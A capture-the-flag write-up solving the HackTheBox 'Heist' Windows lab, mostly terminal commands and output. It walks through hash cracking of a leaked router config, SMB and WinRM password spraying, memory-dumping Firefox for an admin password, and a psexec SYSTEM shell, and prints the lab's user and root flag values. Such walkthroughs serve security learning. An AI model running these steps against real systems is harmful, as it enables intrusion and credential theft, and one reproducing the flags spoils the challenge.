[*]
HackTheBox Heist Writeup is here to see how to solve the Heist (CTF), the machine is rated easy ( which i don’t believe).
CTFs are great learning platform, dont forget to make some notes every time you encounter something new.
I have as always again added machine ip in /etc/hosts on my linux machine as heist.htb .
Step 1 – if you have a host with some IP, nmap it.
Initial nmap scan, we notice 2 more ports when we scan for all the ports with -p-
┌──(abhinav㉿ETHICALHACKX)-[~/htb] └─$ nmap heist.htb Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 19:51 IST Nmap scan report for heist.htb (10.10.10.149) Host is up (0.19s latency). Not shown: 997 filtered ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds ┌──(abhinav㉿ETHICALHACKX)-[~/htb] └─$ nmap -p- -T5 heist.htb Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 19:51 IST Nmap scan report for heist.htb (10.10.10.149) Host is up (0.18s latency). Not shown: 65530 filtered ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 445/tcp open microsoft-ds 5985/tcp open wsman 49669/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 201.88 seconds
Nmap scan for more information using the above ports only.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist] └─$ sudo nmap -sV -sC -A -O -p80,135,445,5985,49669 -T5 heist.htb -oA heist.htb Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 20:00 IST Nmap scan report for heist.htb (10.10.10.149) Host is up (0.17s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Support Login Page |_Requested resource was login.php 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49669/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Timing level 5 (Insane) used No OS matches for host Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 1m40s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-07-22T14:33:24 |_ start_date: N/A TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 173.36 ms 10.10.14.1 2 173.48 ms heist.htb (10.10.10.149) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 103.43 seconds
Checking the page in browser takes us to login page
Notice the Login as Guest Functionality ? Lets click it
We can also see the attachment on the page, which has the text with some hashes
ersion 12.2
no service pad
--SNIP--
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
ip ssh version 2
!--SNIP--
transport input sshWe see three password hashes, lets try to uncover them.
The first one can be decrypted using john
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist] └─$ john hash --wordlist=~/htb/rockyou.txt --rules=Jumbo Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:01 0.00% (ETA: 2022-02-18 03:36) 0g/s 55508p/s 55508c/s 55508C/s 033192..perlis stealth1agent (?) 1g 0:00:00:14 DONE (2021-07-22 22:34) 0.06752g/s 236700p/s 236700c/s 236700C/s stealthy001..ste88dup Use the "--show" option to display all of the cracked passwords reliably Session completed
The other two hashes can be decrypted using a small tool ciscot7 , can be cloned from here.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist] └─$ git clone https://github.com/theevilbit/ciscot7.git Cloning into 'ciscot7'... remote: Enumerating objects: 19, done. remote: Counting objects: 100% (4/4), done. remote: Compressing objects: 100% (4/4), done. remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 15 Receiving objects: 100% (19/19), 6.75 KiB | 2.25 MiB/s, done. Resolving deltas: 100% (5/5), done. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist] └─$ cd ciscot7 ┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7] └─$ ls ciscot7.py LICENSE.md README.md ┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7] └─$ python ciscot7.py -p 0242114B0E143F015F5D1E161713 Decrypted password: $uperP@ssword ┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/ciscot7] └─$ python ciscot7.py -p 02375012182C1A1D751618034F36415408 Decrypted password: Q4)sJuY8qz*A3?d
So far we have 3 passwords and few possible(guess only) usernames.
stealth1agent
$uperP@ssword
Q4)sJuY8qz*A3?dusernames
rout3r
admin
hazardcrackmapexec can help us test these usernames and password using shares module.
The same cam also be done using metasploit.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist] └─$ sudo msfdb run 1 ⨯ [sudo] password for abhinav: msf6 > creds Credentials =========== host origin service public private realm private_type JtR Format ---- ------ ------- ------ ------- ----- ------------ ---------- msf6 > setg USER_FILE user.txt USER_FILE => user.txt msf6 > setg PASS_FILE password.txt PASS_FILE => password.txt msf6 > setg RHOSTS heist.htb RHOSTS => heist.htb msf6 > use auxiliary/scanner/smb/smb_login msf6 auxiliary(scanner/smb/smb_login) > show options Module options (auxiliary/scanner/smb/smb_login): Name Current Setting Required Description ---- --------------- -------- ----------- PASS_FILE password.txt no File containing passwords, one per line RHOSTS heist.htb yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_FILE user.txt no File containing usernames, one per line msf6 auxiliary(scanner/smb/smb_login) > run [*] 10.10.10.149:445 - 10.10.10.149:445 - Starting SMB login bruteforce [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.rout3r:stealth1agent', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.rout3r:$uperP@ssword', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.rout3r:Q4)sJuY8qz*A3?d', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.admin:stealth1agent', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.admin:$uperP@ssword', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.admin:Q4)sJuY8qz*A3?d', [+] 10.10.10.149:445 - 10.10.10.149:445 - Success: '.hazard:stealth1agent' [*] heist.htb:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/smb/smb_login) > creds Credentials =========== host origin service public private realm private_type JtR Format ---- ------ ------- ------ ------- ----- ------------ ---------- 10.10.10.149 10.10.10.149 445/tcp (smb) hazard stealth1agent Password msf6 auxiliary(scanner/smb/smb_login) >
Finding more users with impacket. This can help with RID bruteforce and find more usernames on the machine .
┌──(abhinav㉿ETHICALHACKX)-[/usr/share/doc/python3-impacket/examples] └─$ python3 lookupsid.py 'hazard:stealth1agent'@heist.htb 1 ⨯ Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation [*] Brute forcing SIDs at heist.htb [*] StringBinding ncacn_np:heist.htb[pipelsarpc] [*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112 500: SUPPORTDESKAdministrator (SidTypeUser) 501: SUPPORTDESKGuest (SidTypeUser) 503: SUPPORTDESKDefaultAccount (SidTypeUser) 504: SUPPORTDESKWDAGUtilityAccount (SidTypeUser) 513: SUPPORTDESKNone (SidTypeGroup) 1008: SUPPORTDESKHazard (SidTypeUser) 1009: SUPPORTDESKsupport (SidTypeUser) 1012: SUPPORTDESKChase (SidTypeUser) 1013: SUPPORTDESKJason (SidTypeUser)
We get few more usernames
support
chase
jasonLets again hit the smb scanner with the new information we have on users.
Module options (auxiliary/scanner/smb/smb_login): Name Current Setting Required Description ---- --------------- -------- ----------- PASS_FILE password.txt no File containing passwords, one per line RHOSTS heist.htb yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_FILE user.txt no File containing usernames, one per line msf6 auxiliary(scanner/smb/smb_login) > run [*] 10.10.10.149:445 - 10.10.10.149:445 - Starting SMB login bruteforce [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.rout3r:stealth1agent', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.rout3r:$uperP@ssword', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.rout3r:Q4)sJuY8qz*A3?d', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.admin:stealth1agent', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.admin:$uperP@ssword', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.admin:Q4)sJuY8qz*A3?d', [+] 10.10.10.149:445 - 10.10.10.149:445 - Success: '.hazard:stealth1agent' [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.support:stealth1agent', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.support:$uperP@ssword', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.support:Q4)sJuY8qz*A3?d', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.chase:stealth1agent', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.chase:$uperP@ssword', [+] 10.10.10.149:445 - 10.10.10.149:445 - Success: '.chase:Q4)sJuY8qz*A3?d' [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.jason:stealth1agent', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.jason:$uperP@ssword', [-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.jason:Q4)sJuY8qz*A3?d', [*] heist.htb:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
So we have a new username:password combo chase:Q4)sJuY8qz*A3?d and we had one more from before – hazard:stealth1agent .
Returning back to winrm and setting username as chase to retry, we discover we can login using chase user.
msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/winrm/winrm_login msf6 auxiliary(scanner/winrm/winrm_login) > show options Module options (auxiliary/scanner/winrm/winrm_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list DOMAIN WORKSTATION yes The domain to use for Windows authentification PASSWORD no A specific password to authenticate with PASS_FILE password.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS heist.htb yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 5985 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) URI /wsman yes The URI of the WinRM service USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE user.txt no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME chase USERNAME => chase msf6 auxiliary(scanner/winrm/winrm_login) > run [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONchase:stealth1agent (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONchase:$uperP@ssword (Incorrect: ) [+] 10.10.10.149:5985 - Login Successful: WORKSTATIONchase:Q4)sJuY8qz*A3?d [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONadmin:stealth1agent (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONadmin:$uperP@ssword (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONadmin:Q4)sJuY8qz*A3?d (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONhazard:stealth1agent (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONhazard:$uperP@ssword (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONhazard:Q4)sJuY8qz*A3?d (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONsupport:stealth1agent (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONsupport:$uperP@ssword (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONsupport:Q4)sJuY8qz*A3?d (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONjason:stealth1agent (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONjason:$uperP@ssword (Incorrect: ) [-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATIONjason:Q4)sJuY8qz*A3?d (Incorrect: ) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/winrm/winrm_login) >
We have use chase which can connect , so let’s do it via a script you can get here, it’s a ruby script so install dependencies using sudo gem install dependency-list space separated , and after that running ruby evil-winrm .rb -u chase -p 'Q4)sJuY8qz*A3?d ' -i heist.htb .
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist] └─$ git clone https://github.com/Hackplayers/evil-winrm.git Cloning into 'evil-winrm'... --SNIP--- Receiving objects: 100% (971/971), 2.01 MiB | 5.91 MiB/s, done. Resolving deltas: 100% (566/566), done. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist] └─$ cd evil-winrm ┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm] └─$ ls CHANGELOG.md CODE_OF_CONDUCT.md CONTRIBUTING.md Dockerfile evil-winrm.rb Gemfile Gemfile.lock LICENSE README.md resources ┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm] └─$ cat Gemfile source 'https://rubygems.org' gem 'winrm' gem 'winrm-fs' gem 'stringio' gem 'logger' gem 'fileutils' ┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm] └─$ sudo gem install winrm winrm-fs stringio logger fileutils 1 ⨯ [sudo] password for abhinav: Fetching nori-2.6.0.gem Fetching gssapi-1.3.1.gem Fetching logging-2.3.0.gem Fetching winrm-2.3.6.gem --SNIP--- 13 gems installed ┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist/evil-winrm] └─$ ruby evil-winrm.rb -u chase -p 'Q4)sJuY8qz*A3?d' -i heist.htb Evil-WinRM shell v3.0 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:UsersChaseDocuments>
As usual, we check Desktop for the user flag.
*Evil-WinRM* PS C:UsersChase> gci -recurse . | select fullname FullName -------- C:UsersChase3D Objects C:UsersChaseContacts C:UsersChaseDesktop C:UsersChaseDocuments C:UsersChaseDownloads C:UsersChaseFavorites C:UsersChaseLinks C:UsersChaseMusic C:UsersChasePictures C:UsersChaseSaved Games C:UsersChaseSearches C:UsersChaseVideos C:UsersChaseDesktoptodo.txt C:UsersChaseDesktopuser.txt C:UsersChaseDownloadsVMware-tools-11.2.5-17337674-x86_64.exe C:UsersChaseFavoritesLinks C:UsersChaseFavoritesBing.url C:UsersChaseLinksDesktop.lnk C:UsersChaseLinksDownloads.lnk *Evil-WinRM* PS C:UsersChase> cd desktop *Evil-WinRM* PS C:UsersChasedesktop> ls Directory: C:UsersChasedesktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/22/2019 9:08 AM 121 todo.txt -a---- 4/22/2019 9:07 AM 32 user.txt *Evil-WinRM* PS C:UsersChasedesktop> type user.txt a127daef77ab6d9d92008653295f59c4 *Evil-WinRM* PS C:UsersChasedesktop> type todo.txt Stuff to-do: 1. Keep checking the issues list. 2. Fix the router config. Done: 1. Restricted access for guest user. *Evil-WinRM* PS C:UsersChasedesktop>
Trying other things in different user directory or inetpub or other don’t result into anything useful since no write access.
However in program files directory firefox can be noticed and so we also have a look at running process, which shows couple of entries for firefox.
*Evil-WinRM* PS C:UsersChase> cd ../.. *Evil-WinRM* PS C:> gci Directory: C: Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 4/21/2019 5:33 PM inetpub d----- 9/15/2018 12:49 PM PerfLogs d-r--- 2/18/2021 4:17 PM Program Files d----- 4/22/2019 6:56 AM Program Files (x86) d-r--- 4/22/2019 7:26 AM Users d----- 2/18/2021 4:06 PM Windows *Evil-WinRM* PS C:> cd 'program files' *Evil-WinRM* PS C:program files> gci Directory: C:program files Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 4/21/2019 9:39 AM Common Files d----- 4/21/2019 11:00 AM internet explorer d----- 2/18/2021 4:21 PM Mozilla Firefox d----- 4/22/2019 6:47 AM PHP d----- 4/22/2019 6:46 AM Reference Assemblies d----- 4/22/2019 6:46 AM runphp d----- 2/18/2021 4:05 PM VMware d-r--- 4/21/2019 11:00 AM Windows Defender d----- 4/21/2019 11:00 AM Windows Defender Advanced Threat Protection d----- 9/15/2018 12:49 PM Windows Mail d----- 4/21/2019 11:00 AM Windows Media Player d----- 9/15/2018 12:49 PM Windows Multimedia Platform d----- 9/15/2018 12:58 PM windows nt d----- 4/21/2019 11:00 AM Windows Photo Viewer d----- 9/15/2018 12:49 PM Windows Portable Devices d----- 9/15/2018 12:49 PM Windows Security d----- 9/15/2018 12:49 PM WindowsPowerShell *Evil-WinRM* PS C:program files> Get-Process Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 468 18 2264 5400 372 0 csrss ---SNIP--- 1077 73 172240 248556 6.70 6184 1 firefox 347 20 9912 34732 0.22 6300 1 firefox 401 35 40716 104456 1.09 6436 1 firefox 378 28 25040 62648 1.09 6752 1 firefox 355 25 16324 38932 0.11 6964 1 firefox ----SNIP 1312 27 69108 86932 1.08 968 0 wsmprovhost *Evil-WinRM* PS C:program files>
Let us dump the firefox process pid using Sysinternals from Microsoft .
Upload procdump64.exe to a writable directory ( maybe chase/desktop)
*Evil-WinRM* PS C:program files> cd 'C:/users/chase/desktop' *Evil-WinRM* PS C:userschasedesktop> upload /home/abhinav/htb/heist/SysinternalsSuite/procdump64.exe Info: Uploading /home/abhinav/htb/heist/SysinternalsSuite/procdump64.exe to C:userschasedesktopprocdump64.exe Data: 535048 bytes of 535048 bytes copied Info: Upload successful! *Evil-WinRM* PS C:userschasedesktop> gci Directory: C:userschasedesktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/29/2021 1:17 AM 401288 procdump64.exe -a---- 4/22/2019 9:08 AM 121 todo.txt -a---- 4/22/2019 9:07 AM 32 user.txt *Evil-WinRM* PS C:userschasedesktop> *Evil-WinRM* PS C:userschasedesktop> ./procdump64.exe -accepteula
Lets dump fireforx process one by one with ./processdump64.exe -m process_id_one_at_a_time
dont forget to accept eula by ./processdump64.exe -accepteula .
*Evil-WinRM* PS C:userschasedesktop> ./procdump64.exe -ma 6184 ProcDump v10.1 - Sysinternals process dump utility Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com [01:22:00] Dump 1 initiated: C:userschasedesktopfirefox.exe_210729_012200.dmp [01:22:01] Dump 1 writing: Estimated dump file size is 529 MB. [01:22:02] Dump 1 complete: 529 MB written in 1.4 seconds [01:22:02] Dump count reached. *Evil-WinRM* PS C:userschasedesktop> ./procdump64.exe -ma 6300 ProcDump v10.1 - Sysinternals process dump utility Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com [01:22:20] Dump 1 initiated: C:userschasedesktopfirefox.exe_210729_012220.dmp [01:22:20] Dump 1 writing: Estimated dump file size is 293 MB. [01:22:20] Dump 1 complete: 293 MB written in 0.4 seconds [01:22:21] Dump count reached. *Evil-WinRM* PS C:userschasedesktop> ./procdump64.exe -ma 6436 ProcDump v10.1 - Sysinternals process dump utility Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com [01:22:32] Dump 1 initiated: C:userschasedesktopfirefox.exe_210729_012232.dmp [01:22:32] Dump 1 writing: Estimated dump file size is 350 MB. [01:22:33] Dump 1 complete: 350 MB written in 0.5 seconds [01:22:33] Dump count reached. *Evil-WinRM* PS C:userschasedesktop> ./procdump64.exe -ma 6752 ProcDump v10.1 - Sysinternals process dump utility Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com [01:22:41] Dump 1 initiated: C:userschasedesktopfirefox.exe_210729_012241.dmp [01:22:41] Dump 1 writing: Estimated dump file size is 310 MB. [01:22:42] Dump 1 complete: 310 MB written in 0.4 seconds [01:22:42] Dump count reached. *Evil-WinRM* PS C:userschasedesktop> ./procdump64.exe -ma 6964 ProcDump v10.1 - Sysinternals process dump utility Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com [01:22:50] Dump 1 initiated: C:userschasedesktopfirefox.exe_210729_012250.dmp [01:22:50] Dump 1 writing: Estimated dump file size is 298 MB. [01:22:51] Dump 1 complete: 298 MB written in 0.4 seconds [01:22:51] Dump count reached. *Evil-WinRM* PS C:userschasedesktop>
Downloading these dumps to your local machine can take time depending on your network speed, but can be done with
*Evil-WinRM* PS C:userschasedesktop> gci Directory: C:userschasedesktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/29/2021 1:22 AM 541427283 firefox.exe_210729_012200.dmp -a---- 7/29/2021 1:22 AM 299695231 firefox.exe_210729_012220.dmp -a---- 7/29/2021 1:22 AM 358364796 firefox.exe_210729_012232.dmp -a---- 7/29/2021 1:22 AM 317007025 firefox.exe_210729_012241.dmp -a---- 7/29/2021 1:22 AM 304502485 firefox.exe_210729_012250.dmp -a---- 7/29/2021 1:17 AM 401288 procdump64.exe -a---- 4/22/2019 9:08 AM 121 todo.txt -a---- 4/22/2019 9:07 AM 32 user.txt
Examining the strings in one of the dump files, for me one ending in 012220.dmp and searching only for password strings gives the administrator username and password which is admin@support.htb : 4dD!5}x/re8]FBuZ . Dont forget to add the username administrator and password to our list of user.txt and password.txt
We are able to do login from admin@support.htb but nothing more here even after that on web-page.
Let us again fire crackmapexec to do some validations of our discoveries ( administrator).
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist] └─$ crackmapexec smb 10.10.10.149 -u user.txt -p password.txt 2 ⨯ SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False) SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDeskadministrator:stealth1agent STATUS_LOGON_FAILURE SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDeskadministrator:$uperP@ssword STATUS_LOGON_FAILURE SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDeskadministrator:Q4)sJuY8qz*A3?d STATUS_LOGON_FAILURE SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDeskadministrator:4dD!5}x/re8]FBuZ (Pwn3d!)
and we have a valid combo – administrator:4dD!5}x/re8]FBuZ
Root Flag
Lets now use psexec to get in.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/heist] └─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@heist.htb Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation Password: [*] Requesting shares on heist.htb..... [*] Found writable share ADMIN$ [*] Uploading file iajwQmKr.exe [*] Opening SVCManager on heist.htb..... [*] Creating service PMMu on heist.htb..... [*] Starting service PMMu..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.437] (c) 2018 Microsoft Corporation. All rights reserved. C:Windowssystem32>whoami nt authoritysystem C:Windowssystem32>cd c:/users/administrator/desktop c:UsersAdministratorDesktop>dir Volume in drive C has no label. Volume Serial Number is 78E3-E62D Directory of c:UsersAdministratorDesktop 02/18/2021 04:00 PM <DIR> . 02/18/2021 04:00 PM <DIR> .. 04/22/2019 09:05 AM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 6,840,758,272 bytes free c:UsersAdministratorDesktop>type root.txt 50dfa3c6bfd20e2e0d071b073d766897 c:UsersAdministratorDesktop>
We finally have both user and root flags, hope this box was a great learning.
About Author
